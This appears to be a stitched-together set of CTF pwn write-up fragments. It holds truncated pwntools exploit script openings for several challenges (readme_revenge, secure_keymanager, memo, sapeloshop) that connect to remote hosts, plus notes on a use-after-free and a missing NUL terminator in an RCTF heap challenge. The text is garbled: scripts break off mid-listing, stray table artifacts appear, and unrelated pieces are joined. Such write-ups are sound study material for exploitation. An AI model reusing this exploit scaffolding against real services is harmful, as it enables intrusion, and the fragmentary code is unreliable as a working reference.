The challenge spawns a thread to do the work, so a separate thread arena is created in a new mmap'd segment (the chunks we care about are not in the main brk heap).
Overflow in the read function:
for ( i = 0LL; ; i += v3 )
{
#!/usr/bin/python | |
from pwn import * | |
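# readme_revenge exploit (excerpt; the payload construction continues past this
# listing). Python 2 script: raw_input() and str payloads.
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")  # local target; swap in while debugging
raw_input()  # pause before sending anything (presumably to attach a debugger) -- confirm
#name = "A"*920
name = p64(0x00)  # Pass NULL Check.
name += "XXXX"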
#!/usr/bin/python | |
from pwn import * | |
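# secure_keymanager exploit (excerpt). Python 2 script (raw_input()).
p = remote("secure_keymanager.pwn.seccon.jp",47225)
# Local variant: preload the challenge-provided libc so offsets match the
# remote box (presumably; libc-2.23.so ships with the challenge).
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()  # pause before interacting (presumably to attach a debugger) -- confirm


def menu():
    """Consume output up to the menu prompt.

    NOTE(review): the listing is cut here; the original body may continue
    (e.g. return what was read) -- confirm against the full script.
    """
    p.recvuntil(">>")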
#!/usr/bin/python | |
from pwn import * | |
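# memo exploit (excerpt). Python 2 script (raw_input()).
# `elf` is the *libc*, not the challenge binary -- presumably used for symbol
# offsets later in the script.
elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
# Local variant: preload the same libc so offsets match the remote target.
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()  # pause before interacting (presumably to attach a debugger) -- confirm


def menu():
    """Consume output up to the menu prompt.

    NOTE(review): the listing is cut here; the original body may continue --
    confirm against the full script.
    """
    p.recvuntil(">")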
#!/usr/bin/python | |
from pwn import * | |
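# sapeloshop exploit (excerpt). Python 2 script (raw_input()).
# `elf` is the *libc*, not the challenge binary -- presumably used for symbol
# offsets later in the script.
elf = ELF("./libc-2.23.so")
# pwntools remote() takes a bare host and port, not a URL; the line below
# (kept for reference) would not connect.
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
# Local variant: preload the same libc so offsets match the remote target.
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()  # pause before interacting (presumably to attach a debugger) -- confirm
# 0x3d714: purpose not shown in this excerpt (presumably a libc-2.23 offset) -- confirm
i = 0x3d714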
#!/usr/bin/python | |
from pwn import * | |
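def rol1(val, r_bits, max_bits):
    """Rotate ``val`` left by ``r_bits`` within a ``max_bits``-wide word.

    ``val`` is masked to ``max_bits`` bits, so the result always fits in the
    word; ``r_bits`` is taken modulo ``max_bits``. Plain functions instead of
    lambdas assigned to names (PEP 8 / E731); behaviour is unchanged.
    """
    mask = (1 << max_bits) - 1
    r = r_bits % max_bits
    return ((val << r) & mask) | ((val & mask) >> (max_bits - r))


def ror1(val, r_bits, max_bits):
    """Rotate ``val`` right by ``r_bits`` within a ``max_bits``-wide word.

    Mirror of :func:`rol1`: ``val`` is masked to ``max_bits`` bits and
    ``r_bits`` is taken modulo ``max_bits``.
    """
    mask = (1 << max_bits) - 1
    r = r_bits % max_bits
    return ((val & mask) >> r) | ((val << (max_bits - r)) & mask)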
Challenge from RCTF, the qualifier for XCTF.
There are two bugs in the program: the first is an obvious use-after-free (UAF). The second is that there is no NUL termination immediately after our input, which lets us leak: the NUL byte is always written at buf + size - 1, and the read loop breaks as soon as it sees a "\n", so a short input leaves whatever already sat between the end of our data and buf + size - 1 untouched.
However, leaking is tricky, since the program uses calloc, which zeroes the newly allocated heap chunk (so stale data is not simply left in place for us to read back).